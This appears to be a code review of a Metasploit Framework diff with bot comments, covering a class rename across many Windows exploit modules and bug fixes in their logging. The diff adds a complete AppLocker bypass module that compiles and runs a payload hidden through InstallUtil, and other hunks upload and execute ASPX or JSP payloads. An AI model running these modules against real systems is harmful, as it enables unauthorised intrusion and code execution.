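Review bot: The cleanup code in the `@@ -79,10` hunk still ends in `rescue ::Exception => e`, which also catches `Interrupt` and `SystemExit`, so an operator's Ctrl-C during the file search is reported as a failed delete instead of stopping the run. `rescue ::StandardError => e` keeps the best-effort behaviour without swallowing signals. The same pattern is left in place in the `@@ -85,10` hunk of vmware_vcenter_chargeback_upload.rb. In both files the `begin` opens in the preceding hunk and the method continues outside it.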
@@ -135,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") end # @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # upload_path = uri_path + "#{@upload_random}.aspx" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code > 302) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -183,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + print_status("Writing #{aspx.length} bytes through #{attack_url}...") + print_status("Wrting over #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, 
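Review bot: In the `@@ -135,11` hunk, `res.code = 500` is an assignment rather than a comparison, so the `elsif` is decided by the body match alone and, assuming the response object accepts the write, the real status code is overwritten before the message prints it. The condition should read `elsif (res.code == 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/)`. The identical line is carried through the `@@ -197,12` hunk of this file. Both conditions sit in methods that start outside the hunks.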
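Review bot: The rewritten status line in the `@@ -183,8` hunk keeps the typo `Wrting`. As the line is being edited anyway, it could become `print_status("Writing over #{uri_path}#{@upload_random}.aspx")`, which also makes the message findable when someone searches console logs for "Writing".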
@@ -197,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") end handler end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 2466bffdee..e6e1375362 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*Win32/ ] } @@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote end if cli.type != 'meterpreter' - print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}") + print_error("Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("#{peer} - Searching: #{@dropper}") + print_status("Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? - print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.") + print_error("Unable to find #{@dropper}. Please manually remove it.") return end 
@@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{@dropper} deleted") + print_good("#{@dropper} deleted") return rescue ::Exception => e - print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}") + print_error("Unable to delete #{@dropper}: #{e.message}") end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 0cec534547..5821ba4e27 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 744519e2fd..c39180bfa0 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index bcb6a05fc3..213f3d1b68 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index f0623ef54a..a650c6cbbe 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 3a4eecf03c..4e0e67c8e7 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 60c0e47956..74f593f2ad 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index b425fd66f9..1318d6ac68 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index b4f2dd6579..5a4738e926 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 284ef19b3a..f631cc4e19 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index c58d7acfc6..017b790caa 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 3e201893f9..8b8b9ea12e 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb 
+++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 1b8c895093..d548309299 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" + "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n" - if datastore['InvalidSearchRequest'] == true + if datastore['InvalidSearchRequest'] xml = rand_text(rand(1024) + 32) end diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index de5f2e17b7..fff453f738 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index c5f04e6144..035aa5a85f 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap 
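Review bot: Dropping `== true` in the `@@ -129,7` hunk of ms03_007_ntdll_webdav.rb changes the test from strict equality to truthiness, and in Ruby every value other than `nil` and `false` is truthy, including the string `"false"`. That is equivalent only if `InvalidSearchRequest` is registered as a boolean option so the datastore returns a real `true`/`false`. The option declaration is outside the hunk, so this is worth confirming. If it holds, a comment next to the condition such as `# InvalidSearchRequest is an OptBool, so the value is already true/false` would record the assumption.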
diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index de067d9294..77a2823617 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index f658c6baa2..403dadfdbf 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 25987fbebe..776059c1bb 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index d67fcf75c2..9e984b8f5e 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index e13027054f..f10818b868 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb 
+++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 866fcb3116..f15372a824 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 36ee2fac67..b983440500 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index b24383dc90..f4e2546d73 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index f243370a84..7b580ad5dc 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 45327f91f3..621ae49de5 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index 4ef6097ca4..8f6bacec40 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index bae7c3804c..a254c10cd2 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index eb566db50b..562013f2e4 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index afe668e445..3f0cdc6c27 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 340c2ab009..1b317ddc1f 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 650164ac9e..de284832e7 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index b9b5f4021a..884a2cb940 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index bcd830845f..ffa2f21cb0 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index fb6abff5d1..0c03aed308 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index d870242fdc..0963967016 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] } diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index 50a1a5f24d..abbb005e30 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index a193758e93..1e98ff170f 100644 
--- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 4a7b594cd8..18ef7a6cb2 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 21dc18ab0e..0638dbae5b 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index 28092a2253..1f7d26fd43 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index 0395c7089c..8fd7714f4b 100644 --- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb index a51426ae9c..cdbd812b7c 100644 --- a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb +++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e8982c1720..681a42f712 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index 444f67a6de..5e90adb7e0 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb new file mode 100644 index 0000000000..60d7f07787 --- /dev/null +++ b/modules/exploits/windows/local/applocker_bypass.rb 
@@ -0,0 +1,149 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Post::File + + def initialize(info={}) + super(update_info(info, + 'Name' => 'AppLocker Execution Prevention Bypass', + 'Description' => %q{ + This module will generate a .NET service executable on the target and utilise + InstallUtil to run the payload bypassing the AppLocker protection. + + Currently only the InstallUtil method is provided, but future methods can be + added easily. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Casey Smith', # Original AppLocker bypass research + 'OJ Reeves' # MSF module + ], + 'Platform' => [ 'win' ], + 'Arch' => [ ARCH_X86, ARCH_X86_64 ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> 'Aug 3 2015', + 'References' => + [ + ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57'] + ] + )) + + register_options([ + OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker', + 'INSTALLUTIL', %w(INSTALLUTIL)])]) + end + + # Run Method for when run command is issued + def exploit + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/ + fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.') + end + end + + # sysinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? 
+ + if datastore['TECHNIQUE'] == 'INSTALLUTIL' + execute_installutil + end + end + + def execute_installutil + envs = get_envs('TEMP', 'windir') + + dotnet_path = get_dotnet_path(envs['windir']) + print_status("Using .NET path #{dotnet_path}") + + cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs" + exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe" + + installutil_path = "#{dotnet_path}\\InstallUtil.exe" + + print_status("Writing payload to #{cs_path}") + write_file(cs_path, generate_csharp_source) + register_files_for_cleanup(cs_path) + + print_status("Compiling payload to #{exe_path}") + csc_path = "#{dotnet_path}\\csc.exe" + csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64' + vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") + cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}") + + print_status("Executing payload ...") + vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}") + client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true}) + register_files_for_cleanup(exe_path) + end + + def get_dotnet_path(windir) + base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? 
